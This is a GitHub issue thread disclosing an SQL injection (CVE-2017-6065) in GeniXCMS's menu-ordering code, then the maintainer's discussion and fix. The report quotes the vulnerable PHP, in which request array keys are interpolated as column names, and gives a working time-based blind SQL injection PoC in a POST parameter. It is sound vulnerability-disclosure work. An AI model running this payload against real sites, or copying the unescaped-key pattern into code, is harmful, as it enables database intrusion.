
SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.2(latest) discovered by "ADLab of Venustech" #71

Closed
superfish9 opened this issue Feb 13, 2017 · 11 comments

Comments

@superfish9 commented Feb 13, 2017

inc/lib/Control/Backend/menus.control.php(line 377):

                    if (isset($alertDanger)) {
                        $data['alertDanger'] = $alertDanger;
                    } else {
                        // $_POST['order'] is handed over unchanged: both its keys (menu ids)
                        // and the keys of the nested arrays come straight from the request
                        Menus::updateMenuOrder(
                            $_POST['order']
                        );
                        $data['alertSuccess'][] = 'Menu Order Changed';
                    }

The updateMenuOrder function in inc/lib/Menus.class.php(line 364):

    public static function updateMenuOrder($vars)
    {
        foreach ($vars as $k => $v) {

            // print_r($v);
            $sql = array(
                        'table' => 'menus',
                        'id' => Typo::int($k), // the menu id is cast to int
                        'key' => $v,           // $v is an array; its keys become column names in Db::update()
                    );
            Db::update($sql);
        }
    }

The update function in inc/lib/Db.class.php(line 322):

    public static function update($vars)
    {
        if (is_array($vars)) {
            $set = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);   // only the value is escaped
                $set .= "`$key` = '$val',";  // $key (the column name) is interpolated verbatim
            }

            $set = substr($set, 0, -1);
            $sql = sprintf("UPDATE `%s` SET %s WHERE `id` = '%d' LIMIT 1", $vars['table'], $set, $vars['id']);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
        } elseif (DB_DRIVER == 'mysqli') {
            $q = self::query($sql);
        } elseif (DB_DRIVER == 'pdo') {
            $q = self::$pdo->exec($sql);
        }

        return true;
    }

We'll find that the "$key" in `$set .= "\`$key\` = '$val',";` isn't filtered, which leads to SQL injection.
PoC:
http://127.0.0.1/genixcms100/gxadmin/index.php?page=menus
POST parameters:

changeorder=1&token=YaJthps4lATcGzu81KwublEveIQWQJsTZ4EMCjNF9vDWFbHb4l02LTnxSsa55VKkMGph91SkwHXMpY99&order[0][id`%3D1 and (select * from (select(if(ascii(substr((select user()),1,1))%3D114,sleep(3),0)))a) and `name]=superfish

Don't forget to get a token first.

@semplon (Owner) commented Feb 13, 2017

Thank you, but this had already been fixed in the latest release. See this: https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Db.class.php#L322

I don't know if the fix solves the problem, but at least please try the latest release, which is 1.0.2 already.

@superfish9 (Author) commented Feb 13, 2017

mysql_escape_string filters single quotes, but an attacker can do SQL injection without a single quote, like in my PoC.

@superfish9 changed the title from "SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.0(latest) discovered by "ADLab of Venustech"" to "SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.2(latest) discovered by "ADLab of Venustech"" Feb 13, 2017

@semplon (Owner) commented Feb 13, 2017

Okay, I'll do some research first.

@fgeek commented May 5, 2017

This is CVE-2017-6065.

@semplon semplon closed this Sep 5, 2017

@fgeek commented Sep 5, 2017

@semplon What release or commit fixes this vulnerability?

@semplon (Owner) commented Sep 5, 2017

Aahh, sorry again, I think I missed this issue.
I'll reopen it again.

@semplon semplon reopened this Sep 5, 2017

@semplon semplon self-assigned this Sep 5, 2017

@semplon semplon added the security label Sep 5, 2017

semplon added a commit that referenced this issue Sep 5, 2017

@fgeek commented Sep 8, 2017

@semplon Could you create a new release when you have completely fixed this vulnerability? Thanks.

@semplon (Owner) commented Sep 9, 2017

@fgeek Sure, I'm still checking another bug.

@semplon (Owner) commented Sep 11, 2017

Hello @fgeek, @superfish9, since you have contributed to GeniXCMS, I'll send you a JetBrains open-source license. Please provide me with your email so I can send it to you.

Thanks

semplon added a commit that referenced this issue Sep 11, 2017

#71 #73 #80 #79
Security and Bug Fix
Version 1.1.1

@semplon semplon closed this Sep 11, 2017

@fgeek commented Sep 28, 2017

@semplon Thank you for the offer, but it is not needed. I'm just here to make the internet a safer place for everyone and to improve the quality of GeniX.

@semplon (Owner) commented Sep 29, 2017

Okay @fgeek, I really appreciate all your hard work to make GeniX more secure.

Thank You
